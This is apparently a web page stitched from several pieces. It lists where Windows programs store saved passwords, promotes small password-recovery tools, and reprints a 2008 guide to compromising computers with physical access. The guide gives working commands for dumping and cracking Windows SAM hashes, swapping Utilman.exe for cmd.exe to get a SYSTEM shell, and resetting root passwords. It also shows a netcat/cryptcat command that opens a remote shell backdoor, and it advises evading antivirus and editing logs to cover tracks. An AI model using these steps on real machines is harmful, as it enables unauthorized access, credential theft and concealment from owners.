• Internet Explorer 4.00 – 6.00: The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
  The base key of the Protected Storage is located under the following key:
  “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.
  You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
  Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.

• Internet Explorer 7.00 – 8.00: The new versions of Internet Explorer stores the passwords in 2 different locations.
  AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
  HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.

  IE PassView can be used to recover these passwords.

• Firefox: The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
  These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
  Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.
• Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
  (This filename is SQLite database which contains encrypted passwords and other stuff)
• Opera: The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile
• Outlook Express (All Versions): The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
• Outlook 98/2000: Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.

  Both Mail PassView and Protected Storage PassView utilities can recover these passwords.

• Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key of the account settings.
  The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
  If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.

• Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]
  The account filename is an xml file with .oeaccount extension.
• ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
  You should search a filename with .s extension.
• Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]
• Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]
• MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations:
  1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
  2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
  3. In the Credentials file, with entry named as “Passport.Net\\*”. (Only when the OS is XP or more)
• MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]
• Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”.
• Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
  (”EOptions string” value)
• Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
  The value stored in “ETS” value cannot be recovered back to the original password.
• AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name]
• AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
• ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number]
  (MainLocation value)
• ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
  (The password hash cannot be recovered back to the original password)
• Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
  All other passwords are stored in Digsby servers.
• PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].

The Protected Storage information is saved in a special location in the Registry. The base key of the Protected Storage is located under the following key: “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted. Also, some passwords data are hidden by the operating system.

We are releasing a Demo version of IE Recover that recovers the first 3 characters of your password.

Download IE Recover Demo

194 downloads

The full version is available for $4.99 that shows the complete password.
Built in pure Assembly language this program is only 7kb and fits perfectly on a thumbdrive to carry with you anywhere.

Help support this site by purchasing it ,so we can continue to off you the latest password recovery info.

You can purchase through paypal or e-gold from the links below. Thank you.

The Protected Storage information is saved in a special location in the Registry. The base key of the Protected Storage is located under the following key: “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted. Also, some passwords data are hidden by the operating system.

We are releasing a Demo version of Outlook Recover that recovers the first 3 characters of your password.

The full version is available for $2.99 that shows the complete password.

Built in pure Assembler language this program is only 7kb and fits perfectly on a thumbdrive to carry with you anywhere.

Help support this site by purchasing it ,so we can continue to build and maintain resources that is relied on by IT techs / people in all kinds of situations.

You can purchase through paypal or e-gold from the links below. Thank you.

Table of Contents
-Disclaimer
-Introduction

Part 1: Gaining Access
-LiveCDs
-Windows Option 1: Cracking the Password
-Windows Option 2: Circumventing the Password
-Windows Option 3: Utilman privilege escalation exploit
-MacOSX: Single User Mode
-Linux: /etc/passwd and /etc/shadow

Part 2: Exploiting the System
-Harvesting Information
-Backdoors and Rootkits

Part 3: Conclusion
-Cleaning Up Your Tracks
-How to Prevent These Attacks
-Conclusion
-Tools/Reading Material

————-
Disclaimer
————-

This article is intended as a basic overview of techniques to
compromise computers given physical access. Most of this information
is already easily available online, but I thought putting it all in
one place and explaining the techniques and tools in a concise way
would be a worthwhile endeavor. The text of this article is entirely
my own. Hopefully, this could serve as an introduction for someone
who is just starting out and might give some ideas about where to go
next. This is not intended to be an in-depth guide to any of the
specific techniques or tools mentioned in the article, but hopefully
I’ve included enough explanation for basic understanding of what’s
going on. This article may be re-published without permission,
provided my name remains on it. As computer security is a rapidly
changing field, the contents of this article are relevant today
(7/12/2008), but may be out of date in the near future. However, the
general principles of these attacks will most likely remain the same.

This article is intended for educational use only. The attacks
included should only be attempted with permission from the owner of
the target system. Gaining unauthorized access to a computer system
is a felony, and I am not responsible for any damage caused by the
use of these techniques.

Part 1: Gaining Access

———–
LiveCDs
———–

A LiveCD is a complete (sometimes extremely minimal) operating system
that can be run straight from a CD (or a USB drive). Simply pop in
the CD before booting, turn on the computer, tell it to boot from CD
(on my machine, you can bring up a boot menu by pressing F12), and
go.

My LiveCD of choice is BackTrack (http://www.remote-exploit.org/backtrack.html).
It is a LiveCD designed for security and penetration testing, so it
comes bundled with dozens of powerful programs that every security
expert should have.

The LiveCD can be invaluable in bypassing operating system security
because it generally allows a user to access the partitions of the
harddrive without actually running the native operating system. What
this means is that if you just want access to the files on a machine,
you can stop reading here: just boot to a LiveCD, navigate to the
proper partition, and enjoy full file access. However, actually
gaining access to the programs, services, and information stored on a
computer may be more complicated, and is dependent on the operating
system. I will briefly cover basic tactics for gaining administrative access
to Windows, MacOS, and many versions of Linux.

—————————————————-
Windows Option 1: Cracking the Password
—————————————————-

On most Windows operating systems, user information and passwords are
stored in what is called a SAM file. This file is typically stored
in “WINDOWS/System32/config/SAM”, but is not accessible when
Windows is running. The file itself is encrypted with a key stored
in “WINDOWS/System32/config/system”, which is also not accessible
when Windows is running. However, by booting to a LiveCD, these
files can be accessed, and with the proper tools, decryption of the
SAM file and decryption of the passwords stored within is possible.

For this example, I booted the target Windows machine using BackTrack
3. First, I opened up a terminal and navigated to the directory
containing the SAM and system key, and then copied them to a temp
directory. Then, I navigated to the temp directory and decrypted the
SAM file using the bkhive and samdump2 tools, both of which are
included in BackTrack. The harddrive in this instance was mounted as
“hda2”, but this may vary.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /tmp
# cp system /tmp
# cd /tmp
# bkhive system key
# samdump2 SAM key > /tmp/passwords.txt

This results in the decrypted SAM file being stored as a text file
called “passwords.txt”. Now, the passwords in this file must be
decrypted to plaintext if they are to be usable. On Windows
operating systems prior to Vista, the passwords in the SAM file are
encrypted using a notoriously insecure hashing algorithm called LM
(LanManager). On Vista, the SAM file is encrypted using the more
secure NTLM algorithm.

There are typically three approaches to decrypting these passwords:
rainbow tables, wordlists, and brute-force. The detailed specifics
of these approaches are beyond the scope of this article, but I will
give a brief explanation on these methods.

Rainbow tables use an algorithm based on chains of one-way hash
functions to leverage increased pre-computing time to allow for fast password
cracking. Rainbow tables are specially generated for a specific type of hash
(MD5, LM, etc.), and can take anywhere from minutes to years
to generate, but once they have been generated, they can be a powerful
tool to quickly decrypt passwords. Included in BackTrack is
RainbowCrack (http://www.antsight.com/zsl/rainbowcrack/),
the standard tool for generating and utilizing rainbow tables for decryption.
Pre-generated rainbow tables can be found – I recommend FreeRainbowTables
(http://www.freerainbowtables.com/) and the Shmoo Group
(http://rainbowtables.shmoo.com/) for tables.

Sample usage of rtgen for generating rainbow tables of LM hashes (this may take several hours):

# rtgen lm alpha 1 7 0 2100 8000000 all
# rtgen lm alpha 1 7 1 2100 8000000 all
# rtgen lm alpha 1 7 2 2100 8000000 all
# rtgen lm alpha 1 7 3 2100 8000000 all
# rtgen lm alpha 1 7 4 2100 8000000 all

Sample usage of RainbowCrack for using these rainbow tables to
decrypt our SAM passwords:

First sort the tables:
# rtsort lm_alpha#1-7_0_2100×8000000_all.rt
# rtsort lm_alpha#1-7_1_2100×8000000_all.rt
# rtsort lm_alpha#1-7_2_2100×8000000_all.rt
# rtsort lm_alpha#1-7_3_2100×8000000_all.rt
# rtsort lm_alpha#1-7_4_2100×8000000_all.rt

Next, crack the hashes:
# rcrack *.rt -f passwords.txt

If rainbow tables are not an option due to space constraints (the tables
themselves can be enormous) or other reasons, my next preferred
method is using a wordlist. Wordlists are readily available online
and can allow for a dictionary attack: checking the hashes of every
entry in the wordlist against the hashed password and looking for a
match, which would yield the plaintext password. Wordlists vary from
a simple lower-case dictionary to larger, more comprehensive
combinations of uppercase, lowercase, numbers, and symbols. Using
wordlists is a tradeoff – the larger the wordlist, the higher the
chance of cracking the password, but the longer the cracking will
take. My tool of choice for cracking passwords using wordlists is
John the Ripper (http://www.openwall.com/john/), also included in BackTrack.

Sample usage of John the Ripper with a wordlist:
# john -w=[wordlist] -f=NT passwords.txt

If neither wordlists nor rainbow tables are an option, the last
resort is a brute-force attack. Brute-forcing is trying literally
every possible combination of letters, numbers, and symbols.
Obviously, this technique is time-consuming, and sometimes
prohibitively so. Often it would take years to brute-force a
reasonably long, strong password. But for shorter passwords, this
may be an option. Again, I prefer to use John the Ripper.

Sample usage of John the Ripper using brute-force:
# john –incremental:all -f=NT passwords.txt

———————————————————–
Windows Option 2: Circumventing the Password
———————————————————–

Sometimes, an attacker only desires access to the system but does not
need the knowledge of the owner’s password. It is possible to
completely circumvent the Windows login password by wiping out the
password rather than cracking it. This is usually a much faster,
easier process.

In this attack, I typically boot the target Windows machine using
BackTrack. Then, I navigate to the the “WINDOWS/System32/config”
folder and make a backup of the user’s SAM and system files. This is
for the purposes of covering my tracks and restoring the original
passwords later. If an attacker were not concerned about stealth,
then this step would be unnecessary. I backup the files to a USB
drive that mounts as “sda1”. This may vary on your system.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /mnt/sda1/
# cp system /mnt/sda1/

Next, I reboot and boot to another of my favorite LiveCDs: the NT Password
and Registry Editor (http://home.eunet.no/pnordahl/ntpasswd/).
By navigating through the menus and following the instructions, it
is trivial to reset a chosen user’s password or promote an existing
user to Administrator privileges.

When I am done using the system as an Administrator, I make sure to
restore the user’s original SAM and system file, so there is no
evidence of a password change.

——————————————————————-
Windows Option 3: Utilman privilege escalation exploit
——————————————————————-

Many Windows operating systems allow the running of a service called
Utility Manager prior to actually logging in as a user. This program
is executed with System privileges (a special level higher than
Administrator), so with a LiveCD, it is possible to trick Windows
into executing an arbitrary program with System privileges prior to
logging in. In this example, I’ll get a root shell by tricking
Windows into executing cmd.exe instead of utilman.exe.

I boot up the target Windows machine with BackTrack, and navigate to
“WINDOWS/System32”. Then I simply backup utilman.exe, and copy
cmd.exe on top of utilman.exe.

# cd /mnt/hda2/Windows/System32/
# mv Utilman.exe Utilman.backup
# cp cmd.exe Utilman.exe
# reboot

Then, simply boot the system to Windows, and press Windows + U to
open up a command prompt with System privileges. (Note: this method
of exploitation may soon be patched.)

———————————-
MacOSX: Single User Mode
———————————-

To boot a Mac into “Single User mode”, simply boot the computer
and press Apple + S when blue first shows up on the screen. Next,
mount the harddrive, and either dump the password and crack it with a
tool like John the Ripper, or simply overwrite the root password:

# /sbin/mount -wu /
# /sbin/SystemStarter

To dump the existing root password:
# nidump passwd

To create a new root password:
# passwd root

——————————————-
Linux: /etc/passwd and /etc/shadow
——————————————-

On most Linux operating systems, password information is stored at
/etc/passwd. A sample entry might look like:

root:x:0:0:root:/root:/bin/bash

This is the information for the root user account. The “x”
indicates that the password is encrypted and stored in /etc/shadow.
The corresponding shadow entry might look like:

root:[hash].:14001:0:99999:7:::

This entry contains information on permissions for this user as well
as a hashed password. However, depending on the distribution, Linux
operating systems typically use much more secure hashing functions
including salt values, so decrypting these passwords is not typically
feasible.

Instead, an attacker can reset the password by simply running
BackTrack and checking the /etc/passwd file. If there is an “x”
in the password spot, open the /etc/shadow file and delete the
password hash between the colons. If the hash is in the /etc/passwd
file, simply delete the hash in that file. Then, reboot and login as
root with no password.

Part 2: Exploiting the System

—————————–
Harvesting Information
—————————–

Once an attacker has gained access to a machine, he or she is now
able to begin harvesting information from the system. Most operating
systems have features to store passwords for wireless settings, and
many web browsers will store passwords and reveal them if prompted.
In addition, tools such as keyloggers may be installed to provide
continued information theft after the attacker has left.

There are many tools that are helpful in automatically dumping
private information from a system. On Windows, my favorite is a USB
application called the “USB Switchblade”. I prefer GonZor’s
version (http://gonzor228.com/). This tool can be used to stealthily
dump information on a system that you have access to, but I use it
for all my information gathering needs. It supports the ability to dump
Windows passwords, browser passwords, wireless passwords, and much
more. In addition, it allows you to silently install the VNC remote desktop
tool, which will open up a port (usually 5800) that can be accessed in a
browser for complete remote control. This segues nicely into the next
section…

——————————
Leaving the Door Open
——————————

In addition to stealing information from the user, many attackers
prefer to set up some sort of backdoor to allow future access to the
system remotely. My personal favorite is NetCat (http://netcat.sourceforge.net/),
which has been called the “Swiss army knife of network tools”.
NetCat is a simple utility that can open ports on a machine for
listening for remote connections, and bind those ports to programs.
For example, on a Windows machine I might run the following command
(in the directory that contains my NetCat executable):

nc -l -p[port] -d -e cmd.exe -L

This opens a port on [port] for listening for a remote connection,
and when a connection is made, it binds cmd.exe to the input and
output of that connection, allowing a remote user to execute
commands. Because using NetCat in such a manner leaves an open
door that any attacker could take advantage of, I prefer to use a
modification of NetCat called CryptCat (http://sourceforge.net/projects/cryptcat/),
which allows for password protection and encrypted channels using a
“-k” parameter to set the password:

cryptcat -l -p[port] -k[password] -d -e cmd.exe -L

Then, on my remote machine, I connect to the open port to gain
access:

cryptcat [target IP] [port] -k [password]

These tools are available cross-platform, increasing their
versatility. However, there are dozens of rootkits and backdoors
available for free use. Most are easily detectable by anti-virus
software, so I recommend coding your own backdoors or learning how to
camouflage software to evade anti-virus detection.

Conclusion

——————————-
Cleaning Up Your Tracks
——————————-

One of the more difficult tasks for any attacker is leaving behind no
evidence of the infiltration. In general, it is common practice to
backup any files related to passwords before modifying them, and to
restore these files after the attack is finished. Installing a
backdoor is probably the most difficult challenge for the attacker,
because it involves leaving many clues behind. If a user detects
that a backdoor exists, then it will be quickly closed. Popular
techniques to ensure successful backdoors include piggy-backing on
existing network applications (to use an already open port),
masquerading the process as a system service and hiding the execution
of the process from utilities such as the task manager, and
installing the backdoor to execute on startup. These topics are
highly operating system dependent and go beyond the scope of this
article. Finally, many operating systems keep logs of when users
access the system and run programs, so these logs should be located
and modified from LiveCD at the conclusion of an attack.

————————————-
How to Prevent These Attacks
————————————-

There are a number of simple steps a user can take to mitigate the
risk of attacks via physical access. Obviously, the first and most
important of these is to not allow physical access to a system by an
attacker. The cardinal rule that physical access equals total access
exists for a reason.

However, there are additional security measures that can be taken.
Harddrive encryption is an emergent technology that prevents the
mounting and reading of material without proper authentication.
There are advanced methods of circumventing disk encryption, but this
preventative measure will prevent almost all attacks of this kind.
Also, it is good practice to enable a BIOS or firmware password on
your system. This will prevent booting to a LiveCD or running other
malicious software on a system. Password strength is also very
important: strong passwords contain lowercase letters, uppercase
letters, numbers, and symbols, and are at least 8 characters long.
Having strong passwords seriously mitigates the risk of having the
password cracked via wordlist or rainbow tables, and makes the use of
brute-force infeasible. Finally, in Windows, make sure to disable
the LM hashing protocol if possible, in favor of the more secure NTLM
hash.

————–
Conclusion
————–

Thank you for taking the time to read this article. I hope it will
be useful to someone.

Tools/Reading Material

BackTrack 3 – http://www.remote-exploit.org/backtrack.html
CryptCat – http://sourceforge.net/projects/cryptcat/
Free Rainbow Tables – http://rainbowtables.shmoo.com/
John the Ripper – http://www.openwall.com/john/
NetCat – http://netcat.sourceforge.net/
NT Password and Registry Editor – http://home.eunet.no/pnordahl/ntpasswd/
RainbowCrack – http://www.antsight.com/zsl/rainbowcrack/
Shmoo Group Rainbow Tables - http://rainbowtables.shmoo.com/
USB Switchblade – http://gonzor228.com/

Here’s a few free tools to help you recover lost/unknown Windows passwords, most come with the source code included.

LCP 5.04 – user account passwords auditing and recovery in Windows NT/2000/XP/2003. Can get local or remote hashes and recovers by using
* dictionary attack;
* hybrid of dictionary and brute force attacks;
* brute force attack;

PWDump7 – A newer Windows password hash dumper using rootkit technology to inject and dump Windows password hashes. The resulting hashes can be then be cracked by a program such as John the Ripper(free),or SamInside(not free) or using Rainbow Tables

CachedPasswordDumper v1.3 – This program dumps the password to the screen from the account that is logged in at that time. Currently only Windows XP (up to SP1) and Windows 2003 Server (SP0) are supported. For WinNT/2K use Password Reminder

Alternatively you can boot from a Floppy or CD and use Offline NT Password & Registry Editor which allows you to reset your password to a blank password

CacheDump – The default behavior of Microsoft Windows domain members is to cache the last 10 different login credentials in the registry. Using a tool called CacheDump written by Arnaud Pilon you can dump the cached credentials to a file and this can be cracked with a plugin for john the ripper

PwDumpX 1.4 – is a tool that combines PWDump, Cachedump, and LSADump all in one tool. It allows a user with administrative privileges to
retrieve the domain password cache, password hashes and LSA secrets
from a Windows system